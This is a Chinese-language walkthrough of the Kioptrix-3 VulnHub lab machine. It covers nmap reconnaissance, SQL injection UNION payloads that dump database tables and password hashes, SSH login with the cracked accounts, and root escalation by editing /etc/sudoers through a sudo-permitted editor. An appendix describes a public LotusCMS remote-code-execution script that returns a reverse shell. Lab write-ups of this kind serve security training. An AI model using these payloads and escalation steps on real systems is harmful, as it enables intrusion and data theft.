Kioptrix-3

靶场下载地址

https://download.vulnhub.com/kioptrix/KVM3.rar

信息收集

# Nmap 7.94 scan initiated Thu Dec 21 21:52:25 2023 as: nmap -sn -oN live.nmap 192.168.1.0/24
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.00048s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 0bcc61d9e6ea39148e78c7c68571e53 (192.168.1.2)
Host is up (0.00040s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00054s latency).
MAC Address: 00:0C:29:25:61:5E (VMware)
Nmap scan report for 192.168.1.254 (192.168.1.254)
Host is up (0.00053s latency).
MAC Address: 00:50:56:FA:D3:D6 (VMware)
Nmap scan report for 192.168.1.60 (192.168.1.60)
Host is up.

靶机地址为192.168.1.72

# nmap -sT --min-rate 10000 -p- 192.168.1.72
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 21:52 CST
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00090s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:25:61:5E (VMware)

端口开放情况:

22端口ssh 80端口http服务

# nmap -sT -sC -sV -O -p22,80 192.168.1.72 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 21:52 CST
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00084s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-title: Ligoat Security - Got Goat? Security ...
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
MAC Address: 00:0C:29:25:61:5E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

22端口 openssh 4.7p1 80端口上开放的是http服务 server为apache 2.2.8 其中php版本为5.2.4 靶机为ubuntu运行在vmware中

# nmap -sT --script=vuln -p22,80 192.168.1.72 -oN vuln.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 21:53 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00071s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-trace: TRACE is enabled
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
|_    http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|   /cache/: Potentially interesting folder
|   /core/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /style/: Potentially interesting folder
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.72
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.72:80/index.php?system=Admin
|     Form id: contactform
|     Form action: index.php?system=Admin&page=loginSubmit
|     
|     Path: http://192.168.1.72:80/gallery/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.72:80/index.php?system=Blog&post=1281005380
|     Form id: commentform
|     Form action: 
|     
|     Path: http://192.168.1.72:80/index.php?system=Admin&page=loginSubmit
|     Form id: contactform
|     Form action: index.php?system=Admin&page=loginSubmit
|     
|     Path: http://192.168.1.72:80/gallery/index.php
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.72:80/gallery/gadmin/
|     Form id: username
|_    Form action: index.php?task=signin
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:25:61:5E (VMware)

漏洞脚本探测出来的信息比较多,其中可能存在sql注入,存在多个目录 其中敏感的目录存在phpmyadmin

渗透阶段

先看一下80端口上的服务,肯定是从80端口进行突破了:

首先首页上的url,便可以尝试任意文件读取 sql注入的测试!

尝试任意文件读取漏洞,结果是不存在的!

有一个登陆界面,点击登陆界面的时候,发现http-title变成了LotusCMS,直接搜索公开的漏洞!

存在一个远程命令执行漏洞;一会可以测试一下,在这里看的时候,发现了下面这个界面:

然后就把后面的参数给删掉了 加上单引号,发现报错了:

存在sql注入了,尝试手工测试:

id为2的时候,是没有查询的结果的:

后面加上or语句 然后注释掉后面的sql语句,能查询出来结果!

判断列数: order by 6正常回显,那么就是一共是6列,接下来就是查询报错的回显点在什么位置:

回显点位于2 3这两个位置!接下来就是查询数据库 表名 以及里面的敏感数据!

http://kioptrix3.com/gallery/gallery.php?id=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27gallery%27),user(),4,5,6--+

http://kioptrix3.com/gallery/gallery.php?id=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27gallarific_users%27),user(),4,5,6--+

最终查询出来的账号和密码信息如下:

使用查询出来的账号和密码进行登录发现,一直登录不成功!于是又看了看其他的表,发现第一个是dev_accounts

然后看了下这个表中的各个列名,发现这个表中同样存在着username 和 password!

于是发现了两个账号和相关的密码信息:

利用在线md5平台进行解密:

dreg:Mast3r
loneferret: starwars

尝试利用这两个账号,进行登录web应用! 发现还是无法进行登录~ 再去尝试一下ssh

发现我们直接利用ssh登录成功;下面就是提权的阶段了。

提权

查看系统相关信息:

查看了/etc/passwd,发现存在两个用户,就是我们刚才查询出来的用户:

并且我们当前的用户 bash环境是受限制的,也就是rbash!先看看当前用户具有的suid权限:

没有权限,看看网站根目录下有什么信息吧:

受限制了~ 这里就需要去绕过rbash! 暂时先不去绕过,因为我们拿到了两个用户的账号和密码,通过/etc/passwd文件查看到了两个用户嘛 所以说我们可以尝试去利用ssh登录一下另外一个账号看一下:

同样我们也是可以进行登录的!

发现当前用户的家目录下面存在一个sh的脚本文件!还是想去看一下网站的目录下面存在什么东西,但是在/var/www/html下面什么都没有~

利用find命令去查找 我们直接通过目录扫描发现的相关文件,来定位到网站的目录:

最终在gallery目录下面的gconfig.php文件中发现,数据库的账号和密码信息:

登录到数据库中看了一下数据库里面的详细信息,没什么重要的发现;查看当前用户所具有的suid权限:

发现了两个命令是不需要root用户便可以执行的!其中!/usr/bin/su 是禁止当前用户直接使用su命令切换到root权限!但是下面还有一个命令,/usr/local/bin/ht 暂时不知道他的提权手法是什么,经过查询资料,发现ht是一个编辑器!Linux通过第三方应用提权实战总结 - FreeBuf网络安全行业门户

利用上述文章中提到的提权方法!进行尝试!sudo /usr/local/bin/ht

直接尝试运行,按F3打开文件 打开/etc/sudoers文件:

尝试在/etc/sudoers文件中添加一行命令:/bin/bash

然后按F2保存,再按Ctrl+c进行保存! 之后再次看到当前用户所拥有的sudo权限:

查看root目录下是否存在flag文件:

至此这个靶机也就完成了!

总结

这里回看了红队笔记的讲解,突破点跟本人的方法不太一样,这里进行补充:由于之前我们就发现了LotusCMS!

那么我们可以进行网上搜索公开的漏洞利用脚本等!

https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh

脚本的利用手法为 目标ip 然后就是lotus的路径 ,其实就是根目录 /

./lotuscms.sh 192.168.1.72 /

然后就是提示我们使用什么IP 这里的ip肯定就是我们攻击机的IP地址!

填写端口号,这里攻击机使用7777端口进行监听!

选择 1 ;

执行id等命令,发现我们已经成功的接收到了shell!

之后便是来到了网站的目录下!寻找相关的配置文件!

发现了两个文件,一个事gadmin目录,另一个是配置文件(配置文件就不多说了,因为上面已经看过了)

尝试在web层面进行访问,这个gadmin应该就是后台管理员的登陆页面!

发现了一个后台的登陆地址!之前我们在mysql的数据库中发现了admin的账号和密码信息,便可以进行登录了!之前为什么登陆不进去,因为并不是登录的后台管理员地址!

成功登陆进来!虽然这与我们提权阶段没什么关系,但是当拿到新的信息的时候,需要去思考和权衡突破点的优先级。当然了在提权阶段红笔师父用的方法和本人的 方式是一样的!

(PS:但是这里我有一个疑问,之前在信息收集的时候,曾查看过/etc/sudoers文件的权限,没有写权限,为什么能用编辑器去修改呢?)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/223499.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

持续集成交付CICD:Jira 远程触发 Jenkins 实现更新 GitLab 分支

目录 一、实验 1.环境 2.GitLab 查看项目 3.Jira新建模块 4. Jira 通过Webhook 触发Jenkins流水线 3.Jira 远程触发 Jenkins 实现更新 GitLab 分支 二、问题 1.Jira 配置网络钩子失败 2. Jira 远程触发Jenkins 报错 一、实验 1.环境 (1)主机 …

柔性数组(结构体成员)

目录 前言: 柔性数组: 给柔性数组分配空间: 调整柔性数组大小: 柔性数组的好处: 前言: 柔性数组?可能你从未听说,但是确实有这个概念。听名字,好像就是柔软的数…

Web前端 ---- 【Vue】vue路由守卫(全局前置路由守卫、全局后置路由守卫、局部路由path守卫、局部路由component守卫)

目录 前言 全局前置路由守卫 全局后置路由守卫 局部路由守卫之path守卫 局部路由守卫之component守卫 前言 本文介绍Vue2最后的知识点,关于vue的路由守卫。也就是鉴权,不是所有的组件任何人都可以访问到的,需要权限,而根据权限…

深度学习中的池化

1 深度学习池化概述 1.1 什么是池化 池化层是卷积神经网络中常用的一个组件,池化层经常用在卷积层后边,通过池化来降低卷积层输出的特征向量,避免出现过拟合的情况。池化的基本思想就是对不同位置的特征进行聚合统计。池化层主要是模仿人的…

C# 使用Socket进行简单的通讯

目录 写在前面 代码实现 服务端部分 客户端部分 运行示例 总结 写在前面 在.Net的 System.Net.Sockets 命名空间中包含托管的跨平台套接字网络实现。 System.Net 命名空间中的所有其他网络访问类均建立在套接字的此实现之上。 其中的Socket 类是基于与 Linux、macOS 或 W…

SpringBoot 3 集成Hive 3

前提条件: 运行环境&#xff1a;Hadoop 3.* Hive 3.* MySQL 8 &#xff0c;如果还未安装相关环境&#xff0c;请参考&#xff1a;Hive 一文读懂 Centos7 安装Hadoop3 单机版本&#xff08;伪分布式版本&#xff09; SpringBoot 2 集成Hive 3 pom.xml <?xml ver…

【SpringCloud】-GateWay源码解析

GateWay系列 【SpringCloud】-GateWay网关 一、背景介绍 当一个请求来到 Spring Cloud Gateway 之后&#xff0c;会经过一系列的处理流程&#xff0c;其中涉及到路由的匹配、过滤器链的执行等步骤。今天我们来说说请求经过 Gateway 的主要执行流程和原理是什么吧 二、正文 …

Bwapp学习笔记

1.基本sql语句 #求绝对值 select abs(-1) from dual; #取余数 select mod(10,3); #验证show databases结果是取之于schemata表的 show databases; select schema_name from information_schema.schemata; #查询当前的数据库 select database(); -- 查询数据库版本 s…

HTML5刷题笔记

在 HTML5 中&#xff0c;onblur 和 onfocus 是&#xff1a;事件属性 onblur 和 onfocus 属于焦点事件&#xff1a; onblur&#xff1a;失去焦点 onfocus&#xff1a;获取焦点 HTML5事件window 事件属性 针对 window 对象触发的事件&#xff1a; onafterprint script 文档…

Python入门学习篇(六)——for循环while循环

1 for循环 1.1 常规for循环 1.1.1 语法结构 for 变量名 in 可迭代对象:# 遍历对象时执行的代码 else:# 当for循环全部正常运行完(没有报错和执行break)后执行的代码1.1.2 示例代码 print("----->学生检查系统<------") student_lists["张三",&qu…

Python运算符函数化模块

文章目录 标准运算符替代函数实用工具itemgetterattrgettermethodcaller 刷完这60个标准库模块&#xff0c;成为Python骨灰级玩家 作为编程语言&#xff0c;如果无法做到Lisp的括号风格&#xff0c;那么必然羞于承认自己是函数式。python的lambda表达式以及各种生成式&#xf…

网络基础知识制作网线了解、集线器、交换机与路由器

目录 一、网线的制作 1.1、材料 1.2、网线的标准类别 二、集线器、交换机介绍 2.1、概念&#xff1a; 2.2、OSI七层模型 2.3、TCP/IP四层 三、路由器的配置 3.1、概念 3.2、四个模块 1、 网络状态 2、设备管理 3、应用管理 无人设备接入控制 无线桥接 信号调节…

基于多反应堆的高并发服务器【C/C++/Reactor】(中)ChannelMap 模块的实现

&#xff08;三&#xff09;ChannelMap 模块的实现 这个模块其实就是为Channel来服务的&#xff0c;前面讲了Channel这个结构体里边它封装了文件描述符。假如说我们得到了某一个文件描述符&#xff0c;需要基于这个文件描述符进行它对应的事件处理&#xff0c;那怎么办呢&…

面试官:看你简历了解过并发,我们简单聊一聊

前言&#xff1a; 今天和大家探讨最近的面试题&#xff0c;好久没有面试了&#xff0c;所以在此记录一下。本篇文章主要讲解CyclicBarrier和CountDownLatch的知识。该专栏比较适合刚入坑Java的小白以及准备秋招的大佬阅读。 如果文章有什么需要改进的地方欢迎大佬提出&#xf…

HarmonyOS构建第一个ArkTS应用(FA模型)

构建第一个ArkTS应用&#xff08;FA模型&#xff09; 创建ArkTS工程 若首次打开DevEco Studio&#xff0c;请点击Create Project创建工程。如果已经打开了一个工程&#xff0c;请在菜单栏选择File > New > Create Project来创建一个新工程。 选择Application应用开发&a…

Jenkins自动化部署之后端

准备工作参考本人另外几篇Jenkins相关的文章 新建任务 添加参数配置 字符串参数&#xff1a;分支名称 多选框&#xff1a;项目名称&#xff08;Extended Choice Parameter插件必备&#xff0c;插件安装参考我另外的文章&#xff09; 这个分割规则自定义。只要根据Jenkins…

智能优化算法应用:基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用&#xff1a;基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用&#xff1a;基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.爬行动物算法4.实验参数设定5.算法结果6.…

代码随想录-刷题第三十六天

435. 无重叠区间 题目链接&#xff1a;435. 无重叠区间 思路&#xff1a;本题与452. 用最少数量的箭引爆气球非常像&#xff0c;弓箭的数量就相当于是非交叉区间的数量&#xff0c;只要把弓箭那道题目代码里射爆气球的判断条件加个等号&#xff08;认为[0&#xff0c;1][1&am…

PostGreSQL:货币类型

货币类型&#xff1a;money money类型存储固定小数精度的货币数字&#xff0c;小数的精度由数据库的lc_monetary设置决定。windows系统下&#xff0c;该配置项位于/data/postgresql.conf文件中&#xff0c;默认配置如下&#xff0c; lc_monetary Chinese (Simplified)_Chi…

WARNING: HADOOP_SECURE_DN_USER has been replaced by HDFS_DATANODE_SECURE_USER.

Hadoop启动时警告&#xff0c;但不影响使用&#xff0c;强迫症的我还是决定寻找解决办法 WARNING: HADOOP_SECURE_DN_USER has been replaced by HDFS_DATANODE_SECURE_USER. Using value of HADOOP_SECURE_DN_USER.原因是Hadoop安装配置于root用户下&#xff0c;对文件需要进…